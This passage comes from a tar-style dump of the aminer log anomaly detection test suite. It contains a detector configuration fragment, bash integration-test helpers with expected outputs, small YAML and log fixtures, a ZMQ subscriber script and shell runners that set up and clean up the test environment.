analysis_context.register_component(new_match_path_detector, component_name="NewPath") atom_filter.add_handler(new_match_path_detector) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/HomePath/Username', '/model/HomePath/Path'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) from aminer.analysis.SlidingEventFrequencyDetector import SlidingEventFrequencyDetector sefd = SlidingEventFrequencyDetector(aminer_config=analysis_context.aminer_config, anomaly_event_handlers=[scoring_event_handler], window_size=2, set_upper_limit=1, learn_mode=True, output_logline=False, scoring_path_list=["/model/HomePath/Username"]) analysis_context.register_component(sefd, component_name="SlidingEventFrequencyDetector") atom_filter.add_handler(sefd) # Include the e-mail notification handler only if the configuration parameter was set. from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name="MailHandler") anomaly_event_handlers.append(mail_notification_handler) logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/declarations.sh000077500000000000000000000556161500476301700263500ustar00rootroot00000000000000#!/bin/bash source ../config # declare all expected values without the variable ones. These arrays are used to compare with the incoming log lines. declare -a NEW_PATH_HD_REPAIR_1=("New path(s) detected" "NewMatchPathDetector: \"NewPath\" (1 lines)" " /model/DiskUpgrade: " ": System rebooted for hard disk upgrade" " /model/DiskUpgrade/DTM: " " /model/DiskUpgrade/UNameSpace1: " " /model/DiskUpgrade/UName: " " /model/DiskUpgrade/UNameSpace2: " " /model/DiskUpgrade/User: " " /model/DiskUpgrade/HDRepair: System rebooted for hard disk upgrade" "['/model/DiskUpgrade', '/model/DiskUpgrade/DTM', '/model/DiskUpgrade/UNameSpace1', '/model/DiskUpgrade/UName', '/model/DiskUpgrade/UNameSpace2', '/model/DiskUpgrade/User', '/model/DiskUpgrade/HDRepair']" "Original log line: ") declare -a UNPARSED_ATOM_1=("Unparsed atom received" "SimpleUnparsedAtomHandler: \"UnparsedHandler\" (1 lines)" " System rebooted for hard disk upgrad") declare -a UNPARSED_ATOM_2=("Unparsed atom received" "SimpleUnparsedAtomHandler: \"UnparsedHandler\" (1 lines)" ": System rebooted for hard disk upgrade") declare -a NEW_PATH_HOME_PATH_ROOT_1=("New path(s) detected" "NewMatchPathDetector: \"NewPath\" (1 lines)" " /model/HomePath: The Path of the home directory shown by pwd of the user root is: /root" " /model/HomePath/Pwd: The Path of the home directory shown by pwd of the user " " /model/HomePath/Username: root" " /model/HomePath/Is: is: " " /model/HomePath/Path: /root" "['/model/HomePath', '/model/HomePath/Pwd', '/model/HomePath/Username', '/model/HomePath/Is', '/model/HomePath/Path']" "Original log line: The Path of the home directory shown by pwd of the user root is: /root") declare -a NEW_VALUE_COMBINATION_HOME_PATH_ROOT_1=("New value combination(s) detected" "NewMatchPathValueComboDetector: \"NewValueCombo\" (1 lines)" "(b'root', b'/root')" "Original log line: The Path of the home directory shown by pwd of the user root is: /root") declare -a NEW_VALUE_COMBINATION_HOME_PATH_USER_1=("New value combination(s) detected" "NewMatchPathValueComboDetector: \"NewValueCombo\" (1 lines)" "(b'user', b'/home/user')" "Original log line: The Path of the home directory shown by pwd of the user user is: /home/user") declare -a NEW_VALUE_COMBINATION_HOME_PATH_GUEST_1=("New value combination(s) detected" "NewMatchPathValueComboDetector: \"NewValueCombo\" (1 lines)" "(b'guest', b'/home/guest')" "Original log line: The Path of the home directory shown by pwd of the user guest is: /home/guest") declare -a JSON_OUTPUT=() read -r -d '' VAR << END { "LogData": { "RawLogData": [ " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END localhost root: System rebooted for hard disk upgrad" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1 }, "AnalysisComponent": { "AnalysisComponentIdentifier": 0, "AnalysisComponentType": "SimpleUnparsedAtomHandler", "AnalysisComponentName": "UnparsedHandler", "Message": "Unparsed atom received", "PersistenceFileName": null, "LogResource": "file:///tmp/syslog" } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 1, "AnalysisComponentType": "NewMatchPathDetector", "AnalysisComponentName": "NewPath", "Message": "New path(s) detected", "PersistenceFileName": "Default", "TrainingMode": true, "AffectedLogAtomPaths": [ "/model/DiskUpgrade", "/model/DiskUpgrade/DTM", "/model/DiskUpgrade/UNameSpace1", "/model/DiskUpgrade/UName", "/model/DiskUpgrade/UNameSpace2", "/model/DiskUpgrade/User", "/model/DiskUpgrade/HDRepair" ], "LogResource": "file:///tmp/auth.log" }, "LogData": { "RawLogData": [ " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END localhost root: System rebooted for hard disk upgrade" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1, "AnnotatedMatchElement": { "/model/DiskUpgrade": " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ", "/model/DiskUpgrade/DTM": " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END "/model/DiskUpgrade/UNameSpace1": " ", "/model/DiskUpgrade/UName": "localhost", "/model/DiskUpgrade/UNameSpace2": " ", "/model/DiskUpgrade/User": "root:", "/model/DiskUpgrade/HDRepair": " System rebooted for hard disk upgrade" } } } { "LogData": { "RawLogData": [ " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END localhost root: System rebooted for hard disk upgrad" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1 }, "AnalysisComponent": { "AnalysisComponentIdentifier": 0, "AnalysisComponentType": "SimpleUnparsedAtomHandler", "AnalysisComponentName": "UnparsedHandler", "Message": "Unparsed atom received", "PersistenceFileName": null, "LogResource": "file:///tmp/auth.log" } } { "LogData": { "RawLogData": [ " END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END localhost root: System rebooted for hard disk upgrade" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1 }, "AnalysisComponent": { "AnalysisComponentIdentifier": 0, "AnalysisComponentType": "SimpleUnparsedAtomHandler", "AnalysisComponentName": "UnparsedHandler", "Message": "Unparsed atom received", "PersistenceFileName": null, "LogResource": "file:///tmp/syslog" } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 1, "AnalysisComponentType": "NewMatchPathDetector", "AnalysisComponentName": "NewPath", "Message": "New path(s) detected", "PersistenceFileName": "Default", "TrainingMode": true, "AffectedLogAtomPaths": [ "/model/HomePath", "/model/HomePath/Pwd", "/model/HomePath/Username", "/model/HomePath/Is", "/model/HomePath/Path" ], "LogResource": "file:///tmp/auth.log" }, "LogData": { "RawLogData": [ "The Path of the home directory shown by pwd of the user root is: /root" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1, "AnnotatedMatchElement": { "/model/HomePath": "The Path of the home directory shown by pwd of the user root is: /root", "/model/HomePath/Pwd": "The Path of the home directory shown by pwd of the user ", "/model/HomePath/Username": "root", "/model/HomePath/Is": " is: ", "/model/HomePath/Path": "/root" } } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 2, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "NewValueCombo", "Message": "New value combination(s) detected", "PersistenceFileName": "Default", "TrainingMode": true, "AffectedLogAtomPaths": [ "/model/HomePath/Username", "/model/HomePath/Path" ], "AffectedLogAtomValues": [ "root", "/root" ], "LogResource": "file:///tmp/auth.log" }, "LogData": { "RawLogData": [ "The Path of the home directory shown by pwd of the user root is: /root" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1, "AnnotatedMatchElement": { "/model/HomePath": "The Path of the home directory shown by pwd of the user root is: /root", "/model/HomePath/Pwd": "The Path of the home directory shown by pwd of the user ", "/model/HomePath/Username": "root", "/model/HomePath/Is": " is: ", "/model/HomePath/Path": "/root" } } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 2, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "NewValueCombo", "Message": "New value combination(s) detected", "PersistenceFileName": "Default", "TrainingMode": true, "AffectedLogAtomPaths": [ "/model/HomePath/Username", "/model/HomePath/Path" ], "AffectedLogAtomValues": [ "user", "/home/user" ], "LogResource": "file:///tmp/syslog" }, "LogData": { "RawLogData": [ "The Path of the home directory shown by pwd of the user user is: /home/user" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1, "AnnotatedMatchElement": { "/model/HomePath": "The Path of the home directory shown by pwd of the user user is: /home/user", "/model/HomePath/Pwd": "The Path of the home directory shown by pwd of the user ", "/model/HomePath/Username": "user", "/model/HomePath/Is": " is: ", "/model/HomePath/Path": "/home/user" } } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 2, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "NewValueCombo", "Message": "New value combination(s) detected", "PersistenceFileName": "Default", "TrainingMode": true, "AffectedLogAtomPaths": [ "/model/HomePath/Username", "/model/HomePath/Path" ], "AffectedLogAtomValues": [ "guest", "/home/guest" ], "LogResource": "file:///tmp/auth.log" }, "LogData": { "RawLogData": [ "The Path of the home directory shown by pwd of the user guest is: /home/guest" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1, "AnnotatedMatchElement": { "/model/HomePath": "The Path of the home directory shown by pwd of the user guest is: /home/guest", "/model/HomePath/Pwd": "The Path of the home directory shown by pwd of the user ", "/model/HomePath/Username": "guest", "/model/HomePath/Is": " is: ", "/model/HomePath/Path": "/home/guest" } } } END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END { "AnalysisComponent": { "AnalysisComponentIdentifier": 3, "AnalysisComponentType": "SlidingEventFrequencyDetector", "AnalysisComponentName": "SlidingEventFrequencyDetector", "Message": "Frequency exceeds range for the first time", "PersistenceFileName": "Default", "TrainingMode": true, "AffectedLogAtomPaths": [], "AffectedLogAtomValues": [ "/model/HomePath", "/model/HomePath/Pwd", "/model/HomePath/Username", "/model/HomePath/Is", "/model/HomePath/Path" ], "LogResource": "file:///tmp/auth.log" }, "FrequencyData": { "ExpectedLogAtomValuesFrequencyRange": [ 0, 1 ], "LogAtomValuesFrequency": 2, "WindowSize": 2 }, "LogData": { "RawLogData": [ "The Path of the home directory shown by pwd of the user guest is: /home/guest" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") # These strings are used in the isExpectedOutput()-function to identify the next array to be compared with. NEW_PATH_HD_REPAIR="new_path_hd_repair" UNPARSED_ATOM_HD_REPAIR="unparsed_atom_hd_repair" UNPARSED_ATOM_DATE_TIME="unparsed_atom_date_time" UNPARSED_ATOM_UNAME="unparsed_atom_uname" NEW_PATH_HOME_PATH_ROOT="new_path_home_path_root" NEW_VALUE_COMBINATION_HOME_PATH_ROOT="new_value_combination_home_path_root" NEW_VALUE_COMBINATION_HOME_PATH_USER="new_value_combination_home_path_user" NEW_VALUE_COMBINATION_HOME_PATH_GUEST="new_value_combination_home_path_guest" COUNTER=0 # This function checks if the input value starts with a date of the format YYYY-mm-dd HH:MM:SS. # $1 = String parameter to check function isDate() { if [[ $# -gt 0 && "$1" =~ [0-9]{4}\-[0-9]{2}\-[0-9]{2}\ [0-9]{2}:[0-9]{2}:[0-9]{2}* ]]; then return 0 fi return 1 } # This function checks if the input value contains the local UName. # $1 = String parameter to check function isUname() { if [[ $# -gt 0 && "$1" == *" `cat /etc/hostname`"* ]]; then return 0 fi return 1 } # This function checks if the input value contains name of the currently logged in user. # $1 = String parameter to check function isUser() { if [[ $# -gt 0 && "$1" == *" ` id -u -n`:"* ]]; then return 0 fi return 1 } # This function checks if the input value starts with a date followed by the local UName and the name of the currently logged in user. # The return values vary depending at which point the error occurs. # $1 = String parameter to check function startswithPredefinedMarkers() { if [ $# -eq 0 ]; then return 1 fi isDate "$1" if [ $? != 0 ]; then return 2 fi isUname "$1" if [ $? != 0 ]; then return 3 fi isUser "$1" if [ $? != 0 ]; then return 4 fi return 0 } # This function reads the output of the aminer, which is saved at /tmp/output, until an empty line occurs. # Every time a paragraph was read, the global variable $COUNTER is set to the iteration variable $i. # On the next call of this function all lines until $i equals $COUNTER are skipped. # $1 = String identifier for the expected values # $2 = Prefix position function isExpectedOutput() { before=$COUNTER i=0 temp=0 #ADD HERE if [[ $# -gt 0 && $1 == $NEW_PATH_HD_REPAIR ]]; then EXPECTED=("${NEW_PATH_HD_REPAIR_1[@]}") elif [[ $# -gt 0 && $1 == $UNPARSED_ATOM_HD_REPAIR ]]; then EXPECTED=("${UNPARSED_ATOM_1[@]}") elif [[ $# -gt 0 && $1 == $UNPARSED_ATOM_DATE_TIME ]]; then EXPECTED=("${UNPARSED_ATOM_2[@]}") elif [[ $# -gt 0 && $1 == $UNPARSED_ATOM_UNAME ]]; then EXPECTED=("${UNPARSED_ATOM_2[@]}") elif [[ $# -gt 0 && $1 == $NEW_PATH_HOME_PATH_ROOT ]]; then EXPECTED=("${NEW_PATH_HOME_PATH_ROOT_1[@]}") elif [[ $# -gt 0 && $1 == $NEW_VALUE_COMBINATION_HOME_PATH_ROOT ]]; then EXPECTED=("${NEW_VALUE_COMBINATION_HOME_PATH_ROOT_1[@]}") elif [[ $# -gt 0 && $1 == $NEW_VALUE_COMBINATION_HOME_PATH_USER ]]; then EXPECTED=("${NEW_VALUE_COMBINATION_HOME_PATH_USER_1[@]}") elif [[ $# -gt 0 && $1 == $NEW_VALUE_COMBINATION_HOME_PATH_GUEST ]]; then EXPECTED=("${NEW_VALUE_COMBINATION_HOME_PATH_GUEST_1[@]}") else echo "No valid expected value found!" return 1 fi input="/tmp/output" while IFS= read -r line do #echo "i $i" # Skip already processed lines. if [ $i -lt $COUNTER ]; then i=$((i + 1)) continue # Paragraphs always terminate with an empty line. This line also must be skipped. elif [[ $i -eq $COUNTER && $line == "" ]]; then i=$((i + 1)) temp=1 continue fi #echo "$line" # Every paragraph must start with an date of the format YYYY-mm-dd HH:MM:SS. if [ `expr $i - $COUNTER - $temp` -eq 0 ]; then isDate "$line" ret=$? if [[ $? != 0 ]]; then echo "isDate() return value: $ret" return 2 fi fi # When the prefix position is reached, the predefined markers are checked (date -> uname -> user). # To avoid this check, just use an negative or too high value for the prefix position. if [ `expr $i - $before - $temp` -eq $2 ]; then startswithPredefinedMarkers "$line" ret=$? #echo startswith $? if [[ $ret != 0 ]]; then echo "Startswith() return value: $ret" return 2 fi fi # At the end of an paragraph stop reading the file and go to return from the function. if [ "$line" == "" ]; then break # When the current line contains the expected value at the expected position, # read until the following values do not match or the EXPECTED array ends. elif [[ "$line" == *"${EXPECTED[$i - $before - $temp]}"* ]]; then i=$((i + 1)) while [[ "$line" == *"${EXPECTED[$i - $before - $temp]}"* && "${EXPECTED[$i - $before - $temp]}" != "" ]] do i=$((i + 1)) done # An error occured, when the line does not match or is not empty. else echo "line: $line" echo "expected: ${EXPECTED[$i - $before - $temp]}" return 2 fi done < "$input" COUNTER=$i # Check if all elements of the EXPECTED array were processed. if [ `expr $i - $before - $temp` == "${#EXPECTED[@]}" ]; then return 0 fi return 3 } # This function checks if the output of the StreamPrinterEventHandler is as expected. # The order of the events is fixed and must be expanded every time a new log line is added to the integration test. function checkAllOutputs() { res=0 isExpectedOutput $UNPARSED_ATOM_HD_REPAIR 2 ret=$? if [ $ret == 0 ]; then echo "Unparsed Atom found as expected." else echo "Expected Unparsed Atom was not found! Return value: $ret" res=1 echo "" fi isExpectedOutput $NEW_PATH_HD_REPAIR -1 ret=$? if [ $ret == 0 ]; then echo "NewMatchPath found as expected." else echo "Expected NewMatchPath was not found! Return value: $ret" res=1 echo "" fi isExpectedOutput $UNPARSED_ATOM_HD_REPAIR 2 ret=$? if [ $ret == 0 ]; then echo "Unparsed Atom found as expected." else echo "Expected Unparsed Atom was not found! Return value: $ret" res=1 echo "" fi isExpectedOutput $UNPARSED_ATOM_UNAME -1 ret=$? if [ $ret == 0 ]; then echo "Unparsed Atom found as expected." else echo "Expected Unparsed Atom was not found! Return value: $ret" res=1 echo "" fi isExpectedOutput $NEW_PATH_HOME_PATH_ROOT -1 ret=$? if [ $ret == 0 ]; then echo "NewMatchPath found as expected." else echo "Expected NewMatchPath was not found! Return value: $ret" res=1 echo "" fi isExpectedOutput $NEW_VALUE_COMBINATION_HOME_PATH_ROOT -1 ret=$? if [ $ret == 0 ]; then echo "NewValueCombination found as expected." else echo "Expected NewValueCombination was not found! Return value: $ret" res=1 echo "" fi isExpectedOutput $NEW_VALUE_COMBINATION_HOME_PATH_USER -1 ret=$? if [ $ret == 0 ]; then echo "NewValueCombination found as expected." else echo "Expected NewValueCombination was not found! Return value: $ret" res=1 echo "" fi isExpectedOutput $NEW_VALUE_COMBINATION_HOME_PATH_GUEST -1 ret=$? if [ $ret == 0 ]; then echo "NewValueCombination found as expected." else echo "Expected NewValueCombination was not found! Return value: $ret" res=1 echo "" fi #ADD HERE return $res } # This function checks if the output of the DefaultMailNotificationEventHandler is as expected. # The $linecount variable is the fixed count of log lines and must be changed every time a new log line is added. # At each loop run one mail is read into /tmp/out from which further checks are made. function checkAllMails() { res=0 linecount=10 dpkg -s mailutils &> /dev/null if [ ! $? -eq 0 ]; then echo -e "\e[31mMailutils-package is not installed! Installing it now..]" sudo apt install mailutils -y fi echo "" echo "waiting for mails to arrive.." echo "" i=1 while [ $i -lt $linecount ] do sudo echo p | mail > /tmp/out input="/tmp/out" t=false aminerMail=false while IFS= read -r searched do # Between all mail headers and the content and after the content of the mail always is an empty line. # The paragraph found in the content must also be found in the previously created /tmp/output file. if [ "$searched" == "" ]; then if [ $t == false ]; then t=true else break fi fi # If the first empty line was found and the subject equals "aminer Alerts:" the following paragraph # must be found in the previously created /tmp/output file. if [[ $t == true && $aminerMail == true ]]; then expected="/tmp/output" found=false while IFS= read -r line do if [[ "$line" == "$searched" ]]; then found=true break fi done < "$expected" # Set the aminerMail boolean to True, when the expected subject was found elif [[ "$searched" == *"Subject: aminer Alerts:"* ]]; then #echo "Subject found!" aminerMail=true # Stop searching, when the subject is not the expected aminer subject. elif [[ "$searched" != *"Subject: aminer Alerts:"* && "$searched" == *"Subject:"* ]]; then echo "wrong mail" i=$(($i-1)) break fi # If the time is lesser than the start time of the integration test, an old mail is found. if [[ "$searched" == *"Date: "* ]]; then d="${searched:6}" dat=`date -d "$d" +%s` if [[ $dat -lt $time ]]; then echo "old mail" i=$(($i-1)) break fi fi # An error occured, when a line was not found in the /tmp/output file. if [[ $t == true && $aminerMail == true && $found == false ]]; then echo "$searched" echo "$line" echo "not found!" res=1 fi done < "$input" i=$(($i+1)) done echo "finished waiting.." return $res } # This function checks if the output of the Syslog is as expected. function checkAllSyslogs(){ sudo tail -n 1000 /var/log/syslog > /tmp/out lastLine=`tail -n 1 /tmp/output` if [[ $lastLine == "" ]]; then sudo sed -i "$ d" /tmp/output fi cntr=0 input="/tmp/out" i=0 j=0 while IFS= read -r searched do # every syslog starts with a 15 characters long datetime. d="${searched:0:15}" dat=`date -d "$d" +%s` # Ignore all old syslogs and just process the current ones. if [[ !($dat -lt $time) ]]; then expected="/tmp/output" found=false g=0 while IFS= read -r line do if [ $g == $cntr ]; then # Increase the counters, when a paragraph finished. if [ "$line" == "" ]; then j=0 i=$(($i+1)) cntr=$(($cntr + 1)) g=$(($g+1)) continue fi # The first line of a paragraph always starts with the count of paragraphs logged. if [[ ($j == 0 && "$searched" == *": [$i] $line"*) ]]; then found=true cntr=$(($cntr + 1)) break # All other lines also contain a counter for the lines in the paragraph elif [[ "$searched" == *": [$i-$j] $line"* ]]; then found=true cntr=$(($cntr + 1)) break fi fi g=$(($g+1)) done < "$expected" if [ $found == true ]; then j=$(($j+1)) fi fi done < "$input" echo "finished waiting.." # $NUMBER_OF_LOG_LINES must always be the number of paragraphs in /tmp/output minus one, # as there is no empty line before the first paragraph. if [ $i == $NUMBER_OF_LOG_LINES ]; then return 0 fi return 1 } # This function checks if the output of the Kafka Topic is as expected. function checkKafkaTopic(){ out=$($KAFKA_VERSIONSTRING/bin/kafka-console-consumer.sh --bootstrap-server localhost:9092 --topic test_topic --from-beginning --timeout-ms 60000) for t in "${JSON_OUTPUT[@]}" do if [[ $out != *"$t"* ]]; then echo "searched: $t" echo echo "remaining output: $out" return 1 fi # cut the output string to remove timestamps and datetimes. out=${out#*$t} done return 0 } # This function checks if the output of the ZMQ Topic is as expected. function checkZmqTopic(){ out=$(cat /tmp/zmq) for t in "${JSON_OUTPUT[@]}" do if [[ $out != *"$t"* ]]; then echo "searched: $t" echo echo "remaining output: $out" return 1 fi # cut the output string to remove timestamps and datetimes. out=${out#*$t} done return 0 } logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/offline_mode/000077500000000000000000000000001500476301700257525ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/offline_mode/data/000077500000000000000000000000001500476301700266635ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/offline_mode/data/file1.log000066400000000000000000000000141500476301700303610ustar00rootroot00000000000000a1 b1 c1 z1 logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/offline_mode/data/file2.log000066400000000000000000000000141500476301700303620ustar00rootroot00000000000000a2 b2 c2 z2 logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/offline_mode/offline_mode.yml000066400000000000000000000010021500476301700311140ustar00rootroot00000000000000LearnMode: False Core.LogDir: '/tmp/lib/aminer/log' Core.PersistenceDir: '/tmp/lib/aminer' LogResourceList: - 'file:///tmp/file1.log' - 'file:///tmp/file2.log' Parser: - id: data type: AnyByteDataModelElement name: 'data' - id: model start: True type: FirstMatchModelElement name: 'model' args: - data Input: timestamp_paths: None EventHandlers: - id: stpe type: StreamPrinterEventHandler logdata-anomaly-miner-2.8.0/aecid-testsuite/integration/zmq_subscriber.py000066400000000000000000000011471500476301700267330ustar00rootroot00000000000000import zmq import zmq.asyncio import asyncio import time IPC_SOCK = "/tmp/aminer" ZMQ = "/tmp/zmq" topic = "test_topic" context = zmq.asyncio.Context() async def client(): socket = context.socket(zmq.SUB) socket.connect(f"ipc://{IPC_SOCK}") socket.subscribe(topic) with open(ZMQ, "w") as f: while True: value = await socket.recv_string() value = value.replace(topic, "") if value != "": f.write(value) f.flush() async def main(): await asyncio.gather(client()) if __name__ == "__main__": asyncio.run(main()) logdata-anomaly-miner-2.8.0/aecid-testsuite/runAminerDemo.sh000077500000000000000000000013371500476301700241110ustar00rootroot00000000000000#!/bin/bash ERR=/tmp/err.txt if [[ $1 == *.py ]]; then cp $1 /tmp/demo-config.py sudo chown aminer:aminer /tmp/demo-config.py 2> /dev/null elif [[ $1 == *.yml ]]; then cp $1 /tmp/demo-config.yml sudo chown aminer:aminer /tmp/demo-config.yml 2> /dev/null else exit 2 fi sudo chown -R aminer:aminer /tmp/lib 2> /dev/null sudo chmod +x demo/aminer/aminerDemo.sh sudo ./demo/aminer/aminerDemo.sh > /dev/null 2> $ERR exit_code=$? if `grep -Fq "Traceback" $ERR` || `grep -Fq "{'Parser'" $ERR` || `grep -Fq "FATAL" $ERR` || `grep -Fq "Config-Error" $ERR`; then exit_code=1 fi cat $ERR sudo rm /tmp/demo-config.py 2> /dev/null sudo rm /tmp/demo-config.yml 2> /dev/null sudo rm /tmp/syslog sudo rm $ERR exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runAminerEncodingDemo.sh000077500000000000000000000014121500476301700255520ustar00rootroot00000000000000#!/bin/bash ERR=/tmp/err.txt if [[ $1 == *.py ]]; then cp $1 /tmp/demo-config.py echo "config_properties['Log.Encoding'] = 'latin-1'" >> /tmp/demo-config.py sudo chown aminer:aminer /tmp/demo-config.py 2> /dev/null elif [[ $1 == *.yml ]]; then cp $1 /tmp/demo-config.yml echo "Log.Encoding: 'latin-1'" >> /tmp/demo-config.yml sudo chown aminer:aminer /tmp/demo-config.yml 2> /dev/null else exit 2 fi sudo chown -R aminer:aminer /tmp/lib 2> /dev/null sudo chmod +x demo/aminer/aminerDemo.sh sudo ./demo/aminer/aminerDemo.sh > /dev/null 2> $ERR exit_code=$? OUTPUT=$(cat $ERR) if grep -Fq "Traceback" $ERR; then exit_code=1 fi cat $ERR sudo rm /tmp/demo-config.py 2> /dev/null sudo rm /tmp/demo-config.yml 2> /dev/null sudo rm $ERR exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runAminerIntegrationTest.sh000077500000000000000000000011461500476301700263460ustar00rootroot00000000000000#!/bin/bash echo localhost | sudo tee /etc/hostname > /dev/null cd integration script=$1 sudo chmod +x $script cntr=0 for var in "$@" do if [[ $cntr -gt 0 ]]; then cp "$var" /tmp/"$var" fi cntr=$(($cntr+1)) done cp zmq_subscriber.py /tmp sudo ./$script exit_code=$? cntr=0 for var in "$@" do if [[ $cntr -gt 0 ]]; then sudo rm /tmp/"$var" fi cntr=$(($cntr+1)) done test -e /var/mail/mail && sudo rm -f /var/mail/mail cd .. sudo rm /tmp/syslog sudo rm /tmp/output sudo rm /tmp/zmq_subscriber.py test -e /tmp/out && sudo rm /tmp/out test -e /tmp/auth.log && sudo rm /tmp/auth.log exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runAminerJsonInputDemo.sh000077500000000000000000000054561500476301700257710ustar00rootroot00000000000000#!/bin/bash cp demo/aminerJsonInputDemo/json-input-demo-config.yml /tmp/json-input-demo-config.yml sudo chown -R aminer:aminer /tmp/lib 2> /dev/null sudo chmod +x demo/aminerJsonInputDemo/aminerJsonInputDemo.sh sudo ./demo/aminerJsonInputDemo/aminerJsonInputDemo.sh > /tmp/out.txt exit_code=$? OUTPUT=$(cat /tmp/out.txt) read -r -d '' VAR << END New path(s) detected NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines) /model: {'menu': {'id': 'file', 'value': 'File', 'popup': {'menuitem': [{'value': 'New', 'onclick': 'CreateNewDoc()'}, {'value': 'Open', 'onclick': 'OpenDoc()'}, {'value': 'Close', 'onclick': 'CloseDoc()'}]}}} /model/menu/id/id: file /model/menu/value/value: File /model/menu/popup/menuitem/value/buttonNames: 0 /model/menu/popup/menuitem/onclick/buttonOnclick: 0 /model/menu/popup/menuitem/value/buttonNames: 1 /model/menu/popup/menuitem/onclick/buttonOnclick: 1 /model/menu/popup/menuitem/value/buttonNames: 2 /model/menu/popup/menuitem/onclick/buttonOnclick: 2 ['/model', '/model/menu/popup/menuitem/value/buttonNames', '/model/menu/popup/menuitem/onclick/buttonOnclick', '/model/menu/id/id', '/model/menu/value/value', '/model/menu/popup/menuitem/value/buttonNames/0', '/model/menu/popup/menuitem/onclick/buttonOnclick/0', '/model/menu/popup/menuitem/value/buttonNames/1', '/model/menu/popup/menuitem/onclick/buttonOnclick/1', '/model/menu/popup/menuitem/value/buttonNames/2', '/model/menu/popup/menuitem/onclick/buttonOnclick/2'] Original log line: {"menu": { "id": "file", "value": "File", "popup": { "menuitem": [ {"value": "New", "onclick": "CreateNewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"} ] } }} END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New value combination(s) detected NewMatchPathValueComboDetector: "NewMatchPathValueCombo" (1 lines) (b'file', b'File') Original log line: {"menu": { "id": "file", "value": "File", "popup": { "menuitem": [ {"value": "New", "onclick": "CreateNewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"} ] } }} END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New value(s) detected NewMatchPathValueDetector: "NewMatchPathValue" (1 lines) {'/model/menu/id/id': 'file'} END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New value(s) detected NewMatchPathValueDetector: "NewMatchPathValue" (1 lines) {'/model/menu/value/value': 'File'} END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi sudo rm /tmp/json-input-demo-config.yml 2> /dev/null sudo rm /tmp/syslog sudo rm /tmp/out.txt exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runAminerXmlInputDemo.sh000077500000000000000000000053361500476301700256150ustar00rootroot00000000000000#!/bin/bash cp demo/aminerXmlInputDemo/xml-input-demo-config.yml /tmp/xml-input-demo-config.yml sudo chown -R aminer:aminer /tmp/lib 2> /dev/null sudo chmod +x demo/aminerXmlInputDemo/aminerXmlInputDemo.sh sudo 